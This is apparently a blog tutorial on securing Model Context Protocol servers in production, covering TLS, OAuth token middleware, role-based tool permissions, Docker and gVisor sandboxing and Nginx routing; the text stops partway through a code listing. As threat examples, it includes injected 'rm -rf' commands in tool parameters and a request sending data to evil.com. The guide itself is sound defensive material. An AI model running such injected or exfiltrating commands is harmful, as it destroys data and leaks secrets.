← Back to Home

MCP Protocol Production Guide: Security, Sandbox, and Multi-Server Routing

May 17, 2026 · Advanced

30-Second Takeaway

  • Problem Solved: The MCP reference implementations and community examples only cover "getting it running"—no authentication, no sandboxing, no monitoring. Deploying to production as-is is a security incident waiting to happen.
  • Core Method: Build a complete MCP production stack: transport hardening (stdio → Streamable HTTP + TLS), OAuth 2.1 authentication, tool-level RBAC, Docker sandbox isolation, and multi-server gateway routing.
  • Key Insight: The core challenge of production MCP Servers isn't the protocol itself—it's security, isolation, and observability. The official docs cover none of this. This guide fills the gap.
  • What You'll Gain: Production-ready patterns and runnable code to harden any MCP Server for real deployment.

1. Why MCP Needs Production Hardening

Between "it runs" and "it runs in production" lies an entire security model

In 2025, the MCP (Model Context Protocol) ecosystem exploded: the community contributed thousands of MCP Servers covering GitHub, Slack, Postgres, filesystem operations, browser automation, and virtually every common tool category. Most developers can get an MCP Server running in under 10 minutes following a tutorial.

But the gap between "it runs" and "production-ready" is enormous:

  • Reference implementations are single-process. One client, one server. No connection pooling, no load balancing, no failover.
  • Authentication is absent. stdio mode relies on OS process permissions. HTTP mode has zero built-in auth mechanisms. Whoever connects can call every tool.
  • No execution isolation. Tools call subprocess.run() directly on the host. A file-delete tool can wipe the entire server.
  • No audit trail. Who called which tool, with what parameters, and what happened? Completely invisible.

If you plan to expose an MCP Server to multiple users, multiple teams, or external customers—every one of these gaps is a potential security incident.

The MCP Server Threat Model

Before discussing specific hardening measures, we need to map out what threats a multi-tenant MCP Server actually faces:

Threat Category Attack Scenario Consequence
Unauthorized Access Attacker connects directly to the MCP Server endpoint without any credentials Data exfiltration, resource abuse, malicious operations
Privilege Escalation Low-privilege user invokes tools beyond their role (e.g., read-only user triggers a delete) Data tampering or destruction, system config changes
Command Injection Malicious commands injected through tool parameters (e.g., parameter contains ; rm -rf /) Full server compromise, ransomware
Resource Exhaustion Malicious client floods server with concurrent tool calls, exhausting CPU/memory/connections Denial of service for all legitimate users
Data Exfiltration Tool execution reads sensitive data not intended for the current user User privacy breach, compliance violation
Transport Interception Man-in-the-middle intercepts or modifies stdio data streams or plaintext HTTP Credential theft, response tampering

These aren't theoretical. Any MCP Server exposed to multiple users—whether an internal platform's tool gateway or a SaaS product's Agent backend—will inevitably face at least 3-4 of these threat categories.

What This Guide Covers

This is a complete MCP production deployment guide spanning 6 major areas:

  1. Transport Hardening: From stdio to Streamable HTTP + TLS, unified transport switching, connection pooling
  2. Authentication & Authorization: OAuth 2.1 Bearer Token middleware, tool-level RBAC decorator, stdio credential scheme
  3. Tool Sandboxing & Execution Isolation: Docker/gVisor containerized isolation, filesystem and network restrictions, resource limits
  4. Multi-Server Routing & Gateway Architecture: Nginx multi-MCP gateway config, tool registry discovery, tenant-aware routing
  5. Monitoring, Logging & Observability: OpenTelemetry distributed tracing, structured logging, Prometheus metrics and alerting

One-stop coverage for everything the MCP official docs leave out about production deployment.

Prerequisites: This guide assumes you understand MCP fundamentals—Client/Server architecture, JSON-RPC 2.0, and the Tools/Resources/Prompts primitives. If you need a refresher, start here:

  • What Is an AI Agent — From Chatbot to Autonomous Intelligence
  • Multi-Agent Debate System — Structured Adversarial Cross-Examination
  • Model-Agnostic Agent — Building Universal Agents Across LLM Providers

2. MCP Transport Deep Dive

Two transports, one critical decision

MCP is designed to be transport-agnostic—the protocol layer's Tools/Resources/Prompts remain identical regardless of transport. But in production, your transport choice directly determines your deployment architecture, security model, and operational complexity.

MCP supports two transports: stdio (standard input/output) and Streamable HTTP (HTTP-based streaming with SSE support). The difference isn't "simple vs. complex"—it's completely different use cases.

Dimension stdio Streamable HTTP
Communication Parent process spawns child; JSON-RPC messages exchanged via stdin/stdout HTTP POST for requests, Server-Sent Events (SSE) for streaming responses
Network Reachability Local only—client and server must be on the same machine Cross-network, supports remote deployment and multi-client sharing
Concurrency Single-connection, single-session—one stdio channel serves exactly one client Natively multi-client—HTTP server handles concurrent sessions
Deployment Complexity Simplest—launch a process Requires HTTP server, TLS certs, DNS, load balancer, etc.
Security Relies on OS process-level permissions Requires application-layer auth (OAuth/JWT) + transport-layer encryption (TLS)
Reconnection Process crash = disconnect. Parent must restart the child. HTTP is stateless; session recovery possible via session IDs
Typical Use Claude Desktop local, IDE plugins, single-user dev environments SaaS backends, enterprise Agent platforms, multi-tenant tool gateways

When to use stdio, when to use Streamable HTTP

Use stdio when:

  • You're in development and client + server are on the same machine
  • Tools are used by a single user (e.g., personal Claude Desktop config)
  • Tools operate on local resources only (local files, local databases)
  • OS-level user permissions are sufficient—no network auth needed

Use Streamable HTTP when:

  • Multiple clients (multiple users, multiple applications) need concurrent access
  • Client and server are on different machines (remote deployment)
  • Fine-grained authentication and authorization is required (different users, different tool permissions)
  • You need operational capabilities: logging, monitoring, alerting

A simple rule of thumb: If it's just you, use stdio. If anyone else needs access, use Streamable HTTP.

Transport switching: one server, both transports

In practice, you'll often need: stdio for local debugging, Streamable HTTP for production. Rewriting your server for each transport switch is unacceptable.

The right approach: abstract the transport layer away from core server logic. Here's a TypeScript implementation—the same MCP Server can launch as a stdio process or an HTTP server:

// transport.ts — Transport abstraction: one server, both stdio and Streamable HTTP
import { McpServer } from "@modelcontextprotocol/sdk/server";
import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio";
import { StreamableHTTPServerTransport } from "@modelcontextprotocol/sdk/server/streamableHttp";
import express from "express";

// Core server instance — completely transport-agnostic
const server = new McpServer({
  name: "production-mcp-server",
  version: "1.0.0",
});

// Register tools (example: weather lookup)
server.registerTool("get_weather", {
  description: "Get current weather for a specified city",
  inputSchema: {
    type: "object",
    properties: {
      city: { type: "string", description: "City name" }
    },
    required: ["city"]
  },
  handler: async ({ city }) => {
    // Actual business logic here...
    return { content: [{ type: "text", text: `${city}: Clear, 22°C` }] };
  }
});

// Select transport via environment variable
const TRANSPORT = process.env.MCP_TRANSPORT || "stdio"; // "stdio" | "http"

async function main() {
  if (TRANSPORT === "stdio") {
    // stdio mode: runs as a child process — ideal for local dev and Claude Desktop
    const transport = new StdioServerTransport();
    await server.connect(transport);
    console.error("MCP Server running on stdio"); // stderr won't interfere with protocol on stdout
  } else if (TRANSPORT === "http") {
    // Streamable HTTP mode: runs as an HTTP server — ideal for production
    const app = express();

    // POST /mcp — accept JSON-RPC requests
    app.post("/mcp", async (req, res) => {
      const transport = new StreamableHTTPServerTransport({
        sessionIdGenerator: () => crypto.randomUUID(),
      });
      await server.connect(transport);
      // Forward HTTP request to transport handler
      await transport.handleRequest(req, res);
    });

    // GET /health — health check endpoint
    app.get("/health", (_req, res) => {
      res.json({ status: "ok", transport: "http", uptime: process.uptime() });
    });

    const PORT = parseInt(process.env.MCP_PORT || "3000");
    app.listen(PORT, () => {
      console.log(`MCP Server (HTTP) listening on port ${PORT}`);
    });
  }
}

main().catch(console.error);

The core idea: Tool/Resource/Prompt registration logic never changes. You just pick StdioServerTransport or StreamableHTTPServerTransport at startup. One codebase—npx tsx server.ts for local dev, set one env var for HTTP production mode.

HTTP transport in production: TLS termination & connection pooling

Once you switch to HTTP mode, two infrastructure concerns become mandatory:

TLS Termination

Never expose an MCP Server directly to the internet to handle TLS. The correct architecture:

┌──────────┐      HTTPS       ┌──────────────┐      HTTP       ┌─────────────┐
│  Client  │ ────────────────→ │ Nginx/Caddy  │ ──────────────→ │  MCP Server │
│          │ ←──────────────── │ (TLS term.)  │ ←────────────── │  (localhost) │
└──────────┘                   └──────────────┘                  └─────────────┘

Use Nginx or Caddy as a reverse proxy to handle TLS termination:

# nginx.conf — MCP Server reverse proxy (TLS termination + connection pooling)
upstream mcp_backend {
    server 127.0.0.1:3000;
    # Connection pool: reuse connections to backend MCP Server
    keepalive 32;
    keepalive_requests 1000;
    keepalive_timeout 60s;
}

server {
    listen 443 ssl http2;
    server_name mcp.example.com;

    # TLS certificates (use Let's Encrypt or your CA)
    ssl_certificate     /etc/ssl/certs/mcp.example.com.pem;
    ssl_certificate_key /etc/ssl/private/mcp.example.com.key;
    ssl_protocols       TLSv1.2 TLSv1.3;
    ssl_ciphers         HIGH:!aNULL:!MD5;

    # Route /mcp requests to MCP Server
    location /mcp {
        proxy_pass http://mcp_backend;
        proxy_http_version 1.1;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
        proxy_set_header Connection "";  # enable keepalive connection reuse

        # Timeouts: SSE streaming responses can run for minutes
        proxy_read_timeout 300s;
        proxy_send_timeout 300s;
    }

    # Health check passthrough
    location /health {
        proxy_pass http://mcp_backend;
        proxy_http_version 1.1;
        proxy_set_header Host $host;
    }
}

Connection Pooling

A Streamable HTTP MCP Server is, at its core, a standard HTTP server. Connection pool management follows standard HTTP best practices:

  • Client side: Use HTTP client connection pools (e.g., Python httpx.AsyncClient with limits, or Node.js undici Pool). Don't rebuild TCP connections for every JSON-RPC call.
  • Server side: Ensure your HTTP framework (Express, Fastify, Starlette) has keep-alive enabled, paired with Nginx's keepalive directive.
  • SSE long-lived connections: Streamable HTTP uses SSE for streaming responses. A single tool invocation can run seconds to minutes. Set Nginx's proxy_read_timeout high enough (e.g., 300s) to avoid killing legitimate long-running tool executions.

3. Authentication & Authorization

The unavoidable fact: MCP has zero built-in auth

Search the MCP spec, the Python SDK, the TypeScript SDK—you will not find a single section on "how to verify client identity." This is intentional design: MCP treats authentication as a transport-layer or application-layer concern, not a protocol-level primitive.

But here's what it means in practice: if you do nothing, anyone who can reach your MCP Server endpoint can invoke every tool.

In production, you need two layers of control:

  • Authentication: Verify "who you are"—ensure the request comes from a legitimate client.
  • Authorization: Verify "what you can do"—ensure you can only invoke tools within your permission scope.

OAuth 2.1 Bearer Token Authentication (Streamable HTTP)

For Streamable HTTP transport, the most mature approach is OAuth 2.1 Bearer Token. Clients include Authorization: Bearer <token> in the HTTP header; the server validates the token and extracts permission scopes.

Citable Definition: The MCP authentication layer is the security gateway deployed between the MCP Server and external clients. It verifies client identity (Authentication) and tool invocation permissions (Authorization). MCP itself does not define an auth mechanism—authentication is implemented at the transport layer (e.g., mutual TLS) or application layer (e.g., OAuth 2.1).

Below is a Python Bearer Token validation middleware that can be embedded into any ASGI-based (Starlette/FastAPI) MCP HTTP Server:

# auth_middleware.py — OAuth 2.1 Bearer Token validation middleware for MCP HTTP Server
import time
import jwt  # PyJWT: pip install pyjwt
from starlette.middleware.base import BaseHTTPMiddleware
from starlette.responses import JSONResponse

# ⚠️ In production, load from environment variables or a secrets manager. Never hardcode.
JWT_SECRET = "your-jwt-secret-placeholder"          # JWT signing key
JWT_ALGORITHM = "HS256"                              # Signing algorithm
ISSUER = "https://auth.example.com"                  # Token issuer (Okta, Auth0, etc.)

class MCPAuthMiddleware(BaseHTTPMiddleware):
    """MCP HTTP Server authentication middleware.
    Validates Bearer tokens on every request and extracts user identity + scopes.
    """

    # Paths that skip authentication (e.g., health checks)
    PUBLIC_PATHS = {"/health", "/.well-known/jwks.json"}

    async def dispatch(self, request, call_next):
        # Allowlist: public paths pass through
        if request.url.path in self.PUBLIC_PATHS:
            return await call_next(request)

        # Extract Bearer token from Authorization header
        auth_header = request.headers.get("Authorization", "")
        if not auth_header.startswith("Bearer "):
            return JSONResponse(
                {"error": "missing_authorization", "message": "Bearer token required"},
                status_code=401,
                headers={"WWW-Authenticate": 'Bearer realm="mcp"'}
            )

        token = auth_header[len("Bearer "):]

        # Validate the JWT
        try:
            payload = jwt.decode(
                token,
                JWT_SECRET,
                algorithms=[JWT_ALGORITHM],
                issuer=ISSUER,
                options={"require": ["exp", "sub", "scope"]}
            )
        except jwt.ExpiredSignatureError:
            return JSONResponse(
                {"error": "token_expired", "message": "Token has expired. Request a new one."},
                status_code=401
            )
        except jwt.InvalidTokenError as e:
            return JSONResponse(
                {"error": "invalid_token", "message": f"Token invalid: {str(e)}"},
                status_code=401
            )

        # Inject user identity and scopes into request.state for downstream use
        request.state.user_id = payload["sub"]         # Unique user identifier
        request.state.scopes = set(payload.get("scope", "").split())  # Permission scope set

        # Log access (in production, use structured logging like structlog)
        print(f"[AUTH] user={payload['sub']} scopes={request.state.scopes} "
              f"path={request.url.path}")

        return await call_next(request)

This middleware does four things:

  1. Checks for a Bearer token in the request header
  2. Validates the JWT signature, expiration, and issuer
  3. Extracts user ID and permission scopes from the token
  4. Injects user context into the request, available to all downstream tool handlers

Token issuance is handled by a separate identity provider—Okta, Auth0, Keycloak, or your cloud provider's identity service (AWS Cognito, GCP Identity Platform). The MCP Server only validates tokens—it never issues them. This follows OAuth 2.1 best practices and keeps your MCP Server's attack surface minimal.

Tool-level RBAC: who can call which tool

Authentication tells you who. The bigger question is which tools they can invoke.

Consider a typical internal platform MCP Server exposing these tools:

  • deploy_service — Deploy to production (DevOps only)
  • read_logs — Read application logs (Dev + DevOps)
  • query_metrics — Query monitoring dashboards (entire team)
  • delete_cluster — Delete a Kubernetes cluster (admins only)

Different roles get entirely different tool sets. You need tool-level RBAC (Role-Based Access Control).

Here's a Python @require_scope decorator—one annotation per tool function defines its required permissions:

# rbac.py — Tool-level RBAC decorator for MCP
from functools import wraps
from typing import List

class PermissionDeniedError(Exception):
    """Raised when a user attempts to invoke a tool beyond their scope."""
    def __init__(self, required_scopes: List[str], user_scopes: set):
        self.required_scopes = required_scopes
        self.user_scopes = user_scopes
        super().__init__(
            f"Permission denied. Required: {required_scopes}, user has: {user_scopes}"
        )

def require_scope(*required_scopes: str):
    """Tool-level RBAC decorator.
    Usage:
        @require_scope("deploy:write")
        async def deploy_service(params): ...

    Supports multiple scopes (all must be satisfied):
        @require_scope("admin:read", "cluster:write")
    """
    required = set(required_scopes)

    def decorator(func):
        @wraps(func)
        async def wrapper(ctx, **kwargs):
            # Retrieve the current user's scopes from the request context
            # ctx is the RequestContext injected by the MCP SDK; scopes set by auth middleware
            user_scopes = getattr(ctx, "user_scopes", set())

            # Check if user has all required scopes
            missing = required - user_scopes
            if missing:
                raise PermissionDeniedError(
                    required_scopes=list(required),
                    user_scopes=user_scopes
                )

            # Permission check passed — execute the tool
            return await func(ctx, **kwargs)
        return wrapper
    return decorator


# ========== Usage examples: registering scope-protected tools ==========

# Deploy to production — requires deploy:write scope
@require_scope("deploy:write")
async def deploy_service(ctx, service_name: str, tag: str):
    """Deploy a service to production."""
    # Trigger CI/CD pipeline, rolling update...
    return f"Service {service_name}:{tag} deployment triggered"

# Read application logs — requires log:read scope
@require_scope("log:read")
async def read_logs(ctx, service_name: str, lines: int = 100):
    """Read recent log lines for a service."""
    # Pull logs from ELK/Loki...
    return f"[{service_name}] Last {lines} lines..."

# Query monitoring metrics — requires metrics:read scope
@require_scope("metrics:read")
async def query_metrics(ctx, metric_name: str, time_range: str):
    """Query a monitoring metric."""
    # Pull from Prometheus/Grafana...
    return f"{metric_name} data for {time_range}..."

# Delete cluster — requires cluster:admin scope (highest sensitivity)
@require_scope("cluster:admin")
async def delete_cluster(ctx, cluster_name: str, confirmation: str):
    """Delete a Kubernetes cluster (dangerous — requires confirmation)."""
    if confirmation != f"DELETE-{cluster_name}":
        raise ValueError("Confirmation string mismatch. Operation cancelled.")
    # Execute cluster deletion...
    return f"Cluster {cluster_name} deletion initiated"

The power of this RBAC scheme is declarative permission control:

  • For developers: Write a new tool, think about who should use it, add @require_scope("xxx:write"). No if/else permission logic anywhere in the tool body.
  • For security audits: Every tool's required permissions are instantly visible—just read the decorator arguments.
  • For operations: Permission scopes are assigned at token issuance time (in Okta/Auth0). The MCP Server only validates. Changing permissions requires zero code changes.

Scope naming convention: use the <resource>:<action> format—deploy:write, log:read, cluster:admin. This is clear, readable, and trivially extensible to new tool categories.

stdio transport authentication: environment credentials

In stdio mode, client and server are on the same machine, communicating via inter-process communication. OAuth 2.1 doesn't apply—network authentication is meaningless when there's no network.

stdio authentication relies on OS-level process isolation and environment variable injection:

// claude_desktop_config.json — Claude Desktop MCP Server configuration
{
  "mcpServers": {
    "production-tools": {
      "command": "python",
      "args": ["-m", "mcp_server"],
      "env": {
        "MCP_TRANSPORT": "stdio",
        "MCP_API_KEY": "your-api-key-placeholder",
        "MCP_USER_ROLE": "developer",
        "MCP_ALLOWED_TOOLS": "read_logs,query_metrics"
      }
    }
  }
}

The server reads environment variables to verify identity and enforce restrictions:

# stdio_auth.py — Environment-credential authentication for stdio mode
import os

def get_stdio_identity():
    """Read identity and permissions from environment variables,
    injected by the client (e.g., Claude Desktop) when spawning the server process.
    """
    api_key = os.environ.get("MCP_API_KEY")
    if not api_key:
        raise RuntimeError("stdio mode requires MCP_API_KEY environment variable")

    # In production, validate the API key against your auth service
    # For high-security scenarios, combine with mTLS or Unix socket permissions
    user_role = os.environ.get("MCP_USER_ROLE", "viewer")
    allowed_tools = os.environ.get("MCP_ALLOWED_TOOLS", "").split(",")

    return {
        "api_key": api_key,
        "role": user_role,
        "allowed_tools": [t.strip() for t in allowed_tools if t.strip()],
    }

Three principles for stdio authentication:

  1. Secrets via environment variables—never hardcoded in code or config files.
  2. Tool allowlisting—the MCP_ALLOWED_TOOLS environment variable limits which tools are exposed to the LLM, even if 20 tools are registered in code.
  3. Least privilege—each stdio server instance gets the minimum permissions needed for its task. Switching tasks? Restart with a more constrained instance.

Authentication summary

Transport Auth Scheme Use Case Identity Provider
Streamable HTTP OAuth 2.1 + JWT Bearer Token + scope-based RBAC Multi-tenant SaaS, enterprise Agent platforms, internet-facing MCP gateways Okta, Auth0, AWS Cognito, Keycloak
stdio Environment-injected API key + tool allowlist Claude Desktop local integration, IDE plugins, single-user dev N/A (local process communication)

Authentication and authorization are the first line of defense for MCP production hardening. But even when auth passes, tool execution itself is still dangerous—what if a legitimate user calls a legitimate tool, but the tool executes a malicious command internally? That's what the next section covers: tool sandboxing and execution isolation.

For more background on Agent tool design principles:

  • Agent Tool Design Best Practices — 8 Rules from Production

4. Tool Sandboxing and Execution Isolation

Every tool call is a blob of untrusted code

Authentication and authorization tell you who can call which tool. But even a legitimate user calling a legitimate tool can cause damage—because LLM-generated parameters are inherently unpredictable.

Consider a file-operation tool search_files that accepts a pattern parameter:

  • Normal call: pattern="*.log" — search for log files
  • Malicious / LLM-hallucinated call: pattern="/etc/passwd; rm -rf /data/*" — if the tool uses shell=True internally, this is a disaster

The core principle of sandboxing: the tool execution environment must be fully isolated from the host. Even if a tool executes a malicious command inside the sandbox, consumes excessive resources, or writes to forbidden locations—the host and other tenants remain unaffected.

Option 1: Docker container sandbox (recommended for production)

Docker provides the most mature process isolation model and is suitable for the vast majority of production scenarios. The idea: every tool invocation runs in a brand-new Docker container, which gets destroyed immediately after execution completes.

Here's a Python Docker sandbox executor:

# sandbox_executor.py — Docker container sandbox executor
import subprocess
import uuid
import json
from typing import Dict, Optional
from dataclasses import dataclass

@dataclass
class SandboxConfig:
    """Sandbox configuration — per-tool-call resource limits"""
    image: str = "mcp-sandbox:latest"      # Sandbox base image
    cpu_limit: str = "0.5"                  # Max CPU cores
    memory_limit: str = "256m"             # Max memory
    timeout_seconds: int = 30              # Execution timeout
    network_mode: str = "none"             # Network isolation: none = fully air-gapped
    read_only_root: bool = True            # Root filesystem read-only
    tmpfs_size: str = "64m"               # Temp filesystem size
    workspace_dir: str = "/workspace"      # Working directory inside container

class DockerSandboxExecutor:
    """Docker sandbox executor.
    Each tool call executes in a fresh container; the container is
    automatically destroyed after the call completes.
    """

    def __init__(self, config: SandboxConfig = SandboxConfig()):
        self.config = config

    def execute(self, tool_name: str, command: list, env: Dict[str, str] = None) -> Dict:
        """Execute a command inside an isolated Docker container.
        Args:
            tool_name: Tool name (used for container naming and logging)
            command: Command + argument list (never use shell=True)
            env: Environment variables to inject
        Returns:
            Dict with stdout, stderr, exit_code, duration fields
        """
        container_name = f"mcp-sandbox-{tool_name}-{uuid.uuid4().hex[:8]}"

        docker_cmd = [
            "docker", "run",
            "--rm",                              # Auto-remove container after exit
            "--name", container_name,
            # Resource limits (cgroups v2)
            "--cpus", self.config.cpu_limit,
            "--memory", self.config.memory_limit,
            "--memory-swap", self.config.memory_limit,  # Disable swap
            # Filesystem restrictions
            "--read-only",                        # Root filesystem read-only
            "--tmpfs", f"/tmp:{self.config.tmpfs_size},noexec,nosuid",
            # Network isolation
            "--network", self.config.network_mode,
            # Security hardening
            "--security-opt", "no-new-privileges",  # Prevent privilege escalation
            "--cap-drop", "ALL",                    # Drop all Linux capabilities
            # Working directory
            "-w", self.config.workspace_dir,
            # Image and command
            self.config.image,
        ] + command  # Pass command as a list — no shell interpolation

        try:
            result = subprocess.run(
                docker_cmd,
                capture_output=True,
                text=True,
                timeout=self.config.timeout_seconds,
                env=env or {},
            )
            return {
                "tool": tool_name,
                "container": container_name,
                "exit_code": result.returncode,
                "stdout": result.stdout[:10000],    # Truncate output to avoid log explosion
                "stderr": result.stderr[:10000],
                "killed_by_timeout": False,
            }
        except subprocess.TimeoutExpired:
            # Force-kill the container on timeout
            subprocess.run(["docker", "rm", "-f", container_name],
                          capture_output=True)
            return {
                "tool": tool_name,
                "container": container_name,
                "exit_code": -1,
                "stdout": "",
                "stderr": "",
                "killed_by_timeout": True,
            }

The sandbox base image Dockerfile:

# Dockerfile.sandbox — MCP tool sandbox base image
FROM python:3.12-slim

# Create non-root user (never run as root inside the container)
RUN groupadd -r sandbox && useradd -r -g sandbox -d /workspace sandbox

# Working directory
RUN mkdir -p /workspace && chown sandbox:sandbox /workspace

# Install minimal dependencies required for tool execution (add only what you need)
RUN pip install --no-cache-dir requests==2.31.0

# Switch to non-root user
USER sandbox
WORKDIR /workspace

# Default entrypoint: do nothing (overridden by docker run command args)
ENTRYPOINT ["python", "-c"]

Option 2: gVisor (for higher isolation requirements)

For high-security scenarios—multi-tenant SaaS platforms, financial services, healthcare—Docker's shared-kernel isolation may not be sufficient. Containers share the host Linux kernel; a kernel vulnerability could be exploited to escape the container.

gVisor (open-sourced by Google) provides a user-space kernel that sits between the container and the host kernel, adding an additional isolation layer:

┌─────────────────────────────────────┐
│         Tool process (Python)        │
├─────────────────────────────────────┤
│      gVisor user-space kernel        │  ← Sentry (syscall interception)
├─────────────────────────────────────┤
│         Host Linux kernel            │  ← Real kernel
└─────────────────────────────────────┘

Using gVisor is nearly identical to Docker—just add --runtime=runsc:

# Use gVisor runtime instead of Docker's default runc
docker run --runtime=runsc --rm \
    --cpus="0.5" --memory="256m" \
    --network=none \
    --read-only \
    mcp-sandbox:latest \
    python -c "print('hello from gVisor sandbox')"

In the Python sandbox executor, switching runtimes is a single configuration parameter:

# Add gVisor support to sandbox_executor.py
class DockerSandboxExecutor:
    def __init__(self, config: SandboxConfig = SandboxConfig(),
                 runtime: str = "runc"):  # "runc" | "runsc"
        self.runtime = runtime

    def _build_docker_cmd(self, command: list) -> list:
        cmd = ["docker", "run", "--rm"]
        if self.runtime == "runsc":
            cmd += ["--runtime", "runsc"]
        # ... rest of the command building
        return cmd

Network egress control

Most MCP tools don't need external network access. If a tool calls requests.get("https://evil.com/steal?data=..."), sensitive data could be exfiltrated. Network control strategy:

Policy Level Docker Flag Effect Use Case
Air-gapped --network=none No network interfaces at all, not even localhost File ops, local computation, pure data processing tools
Internal only --network=mcp-internal Can only reach a specific internal Docker network; no internet egress Tools that need internal APIs or databases
Allowlist Custom iptables rules Only specific IPs or domains reachable Tools calling specific external APIs (e.g., weather service)
Unrestricted --network=bridge Container has full internet access Not recommended for production MCP tools

The default policy should be --network=none. Only a small subset of tools that genuinely require network access should be allowlisted for restricted networking.

Resource limits per tool call (cgroups)

Even with sandbox isolation, an unbounded tool call can exhaust Docker daemon resources. The executor above enforces hard limits at two levels:

  • CPU: --cpus=0.5 caps the container at half a CPU core. A runaway computation can't starve other tools.
  • Memory: --memory=256m with --memory-swap=256m disables swap. The container gets OOM-killed rather than pushing the host into swap thrashing.
  • Time: timeout_seconds=30 enforced by subprocess.run(timeout=...). On timeout, the container is force-removed with docker rm -f.

For high-throughput scenarios, tune these per tool category. A query_metrics tool might need 128 MB and 5 seconds; a run_benchmark tool might need 1 GB and 120 seconds. Store these as per-tool configs, not global defaults.

Comparison: no-sandbox vs Docker vs gVisor

Dimension No Sandbox Docker (runc) gVisor (runsc)
Process Isolation ❌ None — tool runs directly in host process space ✅ Namespace + cgroups isolation ✅ User-space kernel isolation, stronger
Filesystem Isolation ❌ Can read/write all host files (per process user) ✅ Read-only rootfs + tmpfs, independent filesystem view ✅ Same as Docker, plus syscall filtering
Network Isolation ❌ Full host network access ✅ --network=none or custom network policy ✅ Same as Docker; user-space network stack is more secure
Resource Limits ❌ None — one tool can exhaust host resources ✅ CPU/memory cgroups hard limits ✅ Same as Docker; ~5-10% additional overhead
Kernel Exploit Defense ❌ Kernel vulns directly threaten the host ⚠️ Shared host kernel; kernel vulns can break out ✅ User-space kernel intercepts syscalls; kernel exploits much harder
Startup Latency ✅ None ✅ ~100–500ms ⚠️ ~200–800ms (extra user-space kernel init)
Ops Complexity ✅ No extra components ✅ Docker engine (near-universal) ⚠️ Requires gVisor installation + containerd config
Recommended For Dev environments only, personal tools Default production choice Multi-tenant SaaS, fintech, healthcare compliance

Production recommendation: start with Docker. Docker's namespace + cgroups isolation is sufficient for 99% of production scenarios. Only upgrade to gVisor when you're serving multiple external customers, executing highly untrusted user code (e.g., user-uploaded scripts), or operating under regulatory compliance requirements (PCI-DSS, HIPAA, SOC 2).

For more on Agent tool design and framework implementation:

  • Agent Tool Design Best Practices — 8 Rules from Production
  • Building an Agent Framework from Scratch — Tools, Memory, and Planning

5. Multi-Server Routing and Gateway Architecture

One MCP Server isn't enough—you need an MCP gateway

A single MCP Server exposing one set of tools only handles the simplest scenarios. As your Agent platform grows, real-world architecture demands:

  • Multiple MCP Servers each managing tools for different domains—filesystem, database, third-party APIs (Slack, GitHub, Jira)
  • A single entry point—clients should know one MCP endpoint, not N different ones
  • Tool-based routing—calling search_files automatically routes to the filesystem Server; calling query_db routes to the database Server
  • Tenant isolation—requests from different tenants route to different backend instances with fully isolated data and resources

This is the job of an MCP gateway.

Nginx multi-MCP gateway configuration

For most teams, Nginx as an MCP gateway is a lightweight, battle-tested solution. Route requests to different MCP Server backends by URL path:

# nginx-mcp-gateway.conf — MCP multi-server gateway configuration
# Unified entry point: https://mcp-gateway.example.com

# Filesystem MCP Server backend (internal port 3001)
upstream mcp_filesystem {
    server 127.0.0.1:3001 weight=1 max_fails=3 fail_timeout=30s;
    server 127.0.0.1:3011 weight=1 max_fails=3 fail_timeout=30s;  # Standby instance
    keepalive 32;
}

# Database MCP Server backend (internal port 3002)
upstream mcp_database {
    least_conn;  # Least-connections LB — database operations have high variance in duration
    server 127.0.0.1:3002 weight=1 max_fails=3 fail_timeout=30s;
    server 127.0.0.1:3012 weight=1 max_fails=3 fail_timeout=30s;
    keepalive 16;
}

# Slack/GitHub third-party API MCP Server (internal port 3003)
upstream mcp_integrations {
    ip_hash;  # IP hash — maintain session stickiness for the same client
    server 127.0.0.1:3003 weight=1 max_fails=3 fail_timeout=30s;
    server 127.0.0.1:3013 weight=1 max_fails=3 fail_timeout=30s;
    keepalive 16;
}

server {
    listen 443 ssl http2;
    server_name mcp-gateway.example.com;

    # TLS configuration (same as earlier)
    ssl_certificate     /etc/ssl/certs/mcp-gateway.example.com.pem;
    ssl_certificate_key /etc/ssl/private/mcp-gateway.example.com.key;
    ssl_protocols       TLSv1.2 TLSv1.3;

    # === Route by URL path to different MCP Servers ===

    # Filesystem tools: /mcp/filesystem → mcp_filesystem backend
    location /mcp/filesystem {
        proxy_pass http://mcp_filesystem;
        proxy_http_version 1.1;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-MCP-Tool-Category "filesystem";
        proxy_set_header Connection "";
        proxy_read_timeout 120s;
        proxy_send_timeout 120s;
    }

    # Database tools: /mcp/database → mcp_database backend
    location /mcp/database {
        proxy_pass http://mcp_database;
        proxy_http_version 1.1;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-MCP-Tool-Category "database";
        proxy_set_header Connection "";
        proxy_read_timeout 300s;  # Database queries can be slow
        proxy_send_timeout 300s;
    }

    # Third-party integrations: /mcp/integrations → mcp_integrations backend
    location /mcp/integrations {
        proxy_pass http://mcp_integrations;
        proxy_http_version 1.1;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-MCP-Tool-Category "integrations";
        proxy_set_header Connection "";
        proxy_read_timeout 180s;
        proxy_send_timeout 180s;
    }

    # Tool discovery endpoint: aggregate all backends' tool lists
    location /mcp/discovery {
        proxy_pass http://127.0.0.1:3000;  # Tool registry service
        proxy_http_version 1.1;
        proxy_set_header Host $host;
    }

    # Health check
    location /health {
        return 200 '{"status":"ok","gateway":"mcp-gateway"}\n';
        add_header Content-Type application/json;
    }
}

Tool registry and discovery pattern

With multiple MCP Server backends, how does a client discover "what tools are available"? Answer: a tool registry—a lightweight HTTP service that aggregates tool lists from all MCP Server backends:

# tool_registry.py — MCP tool registry and discovery service
import httpx
import asyncio
from typing import Dict, List

class ToolRegistry:
    """Aggregates tool lists from multiple MCP Servers,
    providing a unified tool discovery endpoint."""

    # Registered backend MCP Servers
    BACKENDS = {
        "filesystem":   "http://127.0.0.1:3001",
        "database":     "http://127.0.0.1:3002",
        "integrations": "http://127.0.0.1:3003",
    }

    def __init__(self):
        self.tool_index: Dict[str, dict] = {}  # tool_name → {backend, schema, ...}
        self.client = httpx.AsyncClient(timeout=10.0)

    async def refresh(self):
